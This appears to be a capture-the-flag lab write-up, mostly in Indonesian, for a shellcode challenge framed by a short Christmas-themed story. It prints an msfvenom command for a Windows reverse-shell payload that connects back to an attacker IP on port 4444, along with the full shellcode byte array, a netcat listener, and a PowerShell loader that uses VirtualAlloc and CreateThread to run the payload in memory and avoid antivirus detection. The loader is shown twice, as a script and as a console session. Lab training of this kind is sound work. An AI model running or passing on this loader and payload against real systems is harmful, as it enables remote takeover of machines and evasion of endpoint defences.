rwx4m - Day 8: Shellcodes

Glitch the hacker, clever yet distrusted,

Wrote a script with skills finely adjusted.

Shellcode magic to his home it would send,

Where secrets of Wareville he'd carefully penned.

Glitch, a skilled but mistrusted hacker, was prepping for a tech conference. He was eager to share his shellcode script that remotely accessed his home system. As he worked, he noticed Mayor Malware's henchmen lurking nearby.

"They're wasting their time. I don't have anything they'd want," Glitch chuckled.

He didn't realise that hidden in his home system was something they desperately sought—a research paper he wrote on Wareville's defences, a treasure Mayor Malware was eager to obtain.

Essential Terminologies

Shellcode:
Shellcode adalah sebuah potongan kode yang biasanya digunakan oleh aktor jahat dalam serangan eksploitasi, seperti serangan buffer overflow. Kode ini disisipkan ke dalam sistem yang rentan untuk mengeksekusi perintah tertentu. Akibatnya, penyerang dapat menjalankan perintah arbitrer atau bahkan mengambil alih kendali atas mesin yang telah dikompromikan. Shellcode umumnya ditulis menggunakan bahasa assembly dan disampaikan melalui berbagai teknik, bergantung pada kerentanan yang dieksploitasi.

PowerShell:
PowerShell adalah bahasa skrip yang kuat sekaligus shell baris perintah yang terintegrasi di sistem operasi Windows. Alat ini dirancang untuk otomatisasi tugas dan manajemen konfigurasi, memungkinkan pengguna berinteraksi dengan berbagai komponen sistem. PowerShell sering digunakan oleh administrator untuk tujuan yang sah. Namun, penyerang juga sering memanfaatkannya sebagai alat pasca-eksploitasi karena kemampuannya mengakses sumber daya sistem secara mendalam dan menjalankan skrip langsung di memori. Dengan menjalankan skrip di memori, deteksi berbasis disk dapat dihindari.

Windows Defender:
Windows Defender adalah fitur keamanan bawaan Windows yang dirancang untuk mendeteksi dan mencegah skrip berbahaya, termasuk serangan berbasis PowerShell. Defender bekerja dengan memindai kode secara langsung saat runtime. Namun, penyerang sering mencoba menghindari deteksi dengan beberapa metode, seperti:

Obfuscasi Skrip: Menyamarkan konten berbahaya agar sulit dikenali oleh Defender.
Reflektif Injeksi: Memuat kode berbahaya langsung ke dalam memori tanpa menggunakan file di disk, sehingga menghindari deteksi berbasis tanda tangan. Teknik reflektif injeksi akan menjadi salah satu fokus tugas ini.

Windows API:
Windows API (Application Programming Interface) adalah antarmuka yang memungkinkan program berinteraksi dengan sistem operasi Windows. API ini memberikan akses ke fungsi-fungsi sistem tingkat rendah seperti manajemen memori, operasi file, dan jaringan. Windows API menjadi komponen penting karena banyak teknik eksploitasi dan malware memanfaatkannya untuk memanipulasi proses, mengalokasikan memori, atau mengeksekusi shellcode. Beberapa fungsi Windows API yang sering digunakan oleh aktor jahat antara lain:

VirtualAlloc (mengalokasikan memori)
CreateThread (membuat thread baru)
WaitForSingleObject (menunggu penyelesaian thread atau objek tertentu)

Akses Windows API melalui PowerShell Reflection:
PowerShell Reflection adalah teknik lanjutan yang memungkinkan interaksi dinamis dengan Windows API langsung dari PowerShell. Alih-alih menggunakan biner yang sudah dikompilasi, PowerShell Reflection memungkinkan pemanggilan fungsi Windows API secara langsung saat runtime. Teknik ini memungkinkan manipulasi proses sistem tingkat rendah, sehingga menjadi alat utama untuk melewati mekanisme keamanan, berinteraksi dengan sistem operasi, dan menjalankan kode secara diam-diam.

Reverse Shell:
Reverse shell adalah jenis koneksi di mana target (mesin yang ingin diretas) memulai koneksi kembali ke mesin penyerang (dalam hal ini, mesin penyerang disebut AttackBox). Dengan koneksi ini, penyerang dapat mendapatkan akses kendali ke sistem target melalui jaringan.

Generating Shellcode

Shellcode akan dibuat menggunakan tool msfvenom untuk mendapatkan Reverse Shell

Perintah berikut menggunakan msfvenom, sebuah tool dari Metasploit Framework, untuk membuat payload PowerShell berbasis reverse shell.

root@ip-10-10-235-63:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.235.63 LPORT=4444 -f powershell

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

[-] No arch selected, selecting arch: x64 from the payload

No encoder specified, outputting raw payload

Payload size: 460 bytes

Final size of powershell file: 2260 bytes

[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x11,0x5c,0xa,0xa,0xeb,0x3f,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x2,0x0,0x0,0x49,0xb8,0x63,0x6d,0x64,0x0,0x0,0x0,0x0,0x0,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0xd,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x1,0x1,0x48,0x8d,0x44,0x24,0x18,0xc6,0x0,0x68,0x48,0x89,0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0xe,0x41,0xba,0x8,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5

Penjelasan:

-p windows/x64/shell_reverse_tcp
Payload yang digunakan adalah reverse shell untuk sistem operasi Windows dengan arsitektur 64-bit. Payload ini akan memungkinkan mesin target untuk terhubung kembali ke mesin penyerang (listener).
LHOST=10.10.235.63
Alamat IP mesin penyerang yang akan menerima koneksi balik dari target. Dalam hal ini, IP-nya adalah 10.10.235.63.
LPORT=4444
Port yang digunakan oleh listener pada mesin penyerang untuk menerima koneksi dari target, yaitu port 4444.
-f powershell
Format output payload adalah PowerShell, sehingga dapat disisipkan atau dijalankan menggunakan skrip PowerShell.

Listener di aktifkan pada port 4444

root@ip-10-10-235-63:~# nc -lnvp 4444

Listening on 0.0.0.0 4444

....

script ini dijalankan pada powershell

$VrtAlloc = @"

using System;

using System.Runtime.InteropServices;

public class VrtAlloc{

[DllImport("kernel32")]

public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

}

"@

Add-Type $VrtAlloc

$WaitFor= @"

using System;

using System.Runtime.InteropServices;

public class WaitFor{

[DllImport("kernel32.dll", SetLastError=true)]

public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

}

"@

Add-Type $WaitFor

$CrtThread= @"

using System;

using System.Runtime.InteropServices;

public class CrtThread{

[DllImport("kernel32", CharSet=CharSet.Ansi)]

public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

}

"@

Add-Type $CrtThread

[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x11,0x5c,0xa,0xa,0xeb,0x3f,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x2,0x0,0x0,0x49,0xb8,0x63,0x6d,0x64,0x0,0x0,0x0,0x0,0x0,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0xd,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x1,0x1,0x48,0x8d,0x44,0x24,0x18,0xc6,0x0,0x68,0x48,0x89,0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0xe,0x41,0xba,0x8,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5

[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)

$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)

[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

Penjelasan Script

Definisi Fungsi P/Invoke:
Script ini memanfaatkan Platform Invocation (P/Invoke) untuk mengakses fungsi API Windows dari PowerShell. Tiga fungsi API yang dideklarasikan adalah:
- VirtualAlloc: Digunakan untuk mengalokasikan memori di proses saat ini dengan akses eksekusi.
- CreateThread: Membuat thread baru yang mengeksekusi kode di alamat memori tertentu.
- WaitForSingleObject: Menunggu hingga thread yang dibuat selesai berjalan.
Payload (Shellcode):
- buf adalah array byte yang menyimpan payload dalam format shellcode. Payload ini biasanya merupakan kode biner yang dirancang untuk melakukan tindakan tertentu, seperti membuka koneksi balik (reverse shell) ke penyerang.
Alokasi Memori dan Eksekusi:
- Memori dialokasikan menggunakan VirtualAlloc dengan flag 0x3000 (alokasi memori untuk eksekusi dan pembacaan).
- Payload di-copy ke memori yang sudah dialokasikan menggunakan Marshal.Copy.
- Thread baru dibuat menggunakan CreateThread untuk menjalankan payload yang ada di alamat memori tersebut.
- Fungsi WaitForSingleObject dipanggil untuk memastikan script menunggu sampai thread selesai.

Intisari Tujuan Kode

Kode ini dirancang untuk menjalankan shellcode secara langsung dari memori tanpa menyimpan payload ke disk. Teknik ini sering digunakan untuk menghindari deteksi antivirus atau endpoint protection systems. Namun, kode seperti ini juga dapat dianggap berbahaya jika digunakan tanpa izin atau dalam konteks ilegal.

PS C:\Users\glitch> $VrtAlloc = @"

>> using System;

>> using System.Runtime.InteropServices;

>>

>> public class VrtAlloc{

>> [DllImport("kernel32")]

>> public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

>> }

>> "@

PS C:\Users\glitch>

PS C:\Users\glitch> Add-Type $VrtAlloc

PS C:\Users\glitch>

PS C:\Users\glitch> $WaitFor= @"

>> using System;

>> using System.Runtime.InteropServices;

>>

>> public class WaitFor{

>> [DllImport("kernel32.dll", SetLastError=true)]

>> public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

>> }

>> "@

PS C:\Users\glitch>

PS C:\Users\glitch> Add-Type $WaitFor

PS C:\Users\glitch>

PS C:\Users\glitch> $CrtThread= @"

>> using System;

>> using System.Runtime.InteropServices;

>>

>> public class CrtThread{

>> [DllImport("kernel32", CharSet=CharSet.Ansi)]

>> public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

>>

>> }

>> "@

PS C:\Users\glitch> Add-Type $CrtThread

PS C:\Users\glitch> [Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x11,0x5c,0xa,0xa,0xeb,0x3f,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x2,0x0,0x0,0x49,0xb8,0x63,0x6d,0x64,0x0,0x0,0x0,0x0,0x0,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0xd,0x59,0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x1,0x1,0x48,0x8d,0x44,0x24,0x18,0xc6,0x0,0x68,0x48,0x89,0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0xe,0x41,0xba,0x8,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5

PS C:\Users\glitch> [IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)

PS C:\Users\glitch> [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)

PS C:\Users\glitch> $thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)

PS C:\Users\glitch> [WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

....

Setelah script dijalankan pada powershell, maka akan mendapatkan Reverse Shell dan mendapatkan flag pada file flag.txt yang berada pada direktori C:\Users\glitch\Desktop